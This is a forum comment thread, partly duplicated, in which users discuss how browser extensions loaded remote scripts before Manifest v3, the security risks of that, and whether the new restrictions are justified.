Its the reason why they found it because the code was in extension. Before manifest v3, extensions could just load external scripts and there's no way you could tell what they were actually doing.
Even if the extension isn’t malicious, it creates a new attack vector that can affect users. If whatever URL the script is remotely loaded from is compromised, now all users of that extension are vulnerable.
Most browser extensions don’t need to insert script tags that point to arbitrary URLs on the internet. You can inject scripts that are bundled with the extension (you don’t even need to use an actual script tag). This is one part of manifest v3 that I think was actually a good change - ad blockers don’t do this so I don’t think Google had an ulterior motive for this particular limitation.
That is correct. You can not inject external scripts. You can fetch from a remote and inject through the content script though, but the content and service worker code is known at review time.
So you can still do everything you could before, but it’s not as hidden anymore
He may have understood it, but the feelings of anger about it are so overwhelming he had to post anyway, even if it didn't perfectly flow with the conversation.
Its the reason why they found it because the code was in extension. Before manifest v3, extensions could just load external scripts and there's no way you could tell what they were actually doing.
> extensions could just load external scripts and there's no way you could tell what they were actually doing.
I do think security researchers would be able to figure out what scripts are downloaded and run.
Regardless, none of this seems to matter to end users whether the script is in the extension or external.
nothing stopping server side logic: if request.ip != myvictim, serve no malicious payload.
Even if the extension isn’t malicious, it creates a new attack vector that can affect users. If whatever URL the script is remotely loaded from is compromised, now all users of that extension are vulnerable.
Wait, does that mean Manifest v3 is so neutered that it can't load a `<script>` tag into the page if an extension needed to?
If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.
Most browser extensions don’t need to insert script tags that point to arbitrary URLs on the internet. You can inject scripts that are bundled with the extension (you don’t even need to use an actual script tag). This is one part of manifest v3 that I think was actually a good change - ad blockers don’t do this so I don’t think Google had an ulterior motive for this particular limitation.
That is correct. You can not inject external scripts. You can fetch from a remote and inject through the content script though, but the content and service worker code is known at review time.
So you can still do everything you could before, but it’s not as hidden anymore
Let me ask you this way: How do you think they make money?
I believe you may be missing the sarcasm of the post you are responding to.
I’m here to inform you that you perhaps missed the second-order sarcasm of the post you responded to. Hopefully the chain ends here.
1 reply →
He may have understood it, but the feelings of anger about it are so overwhelming he had to post anyway, even if it didn't perfectly flow with the conversation.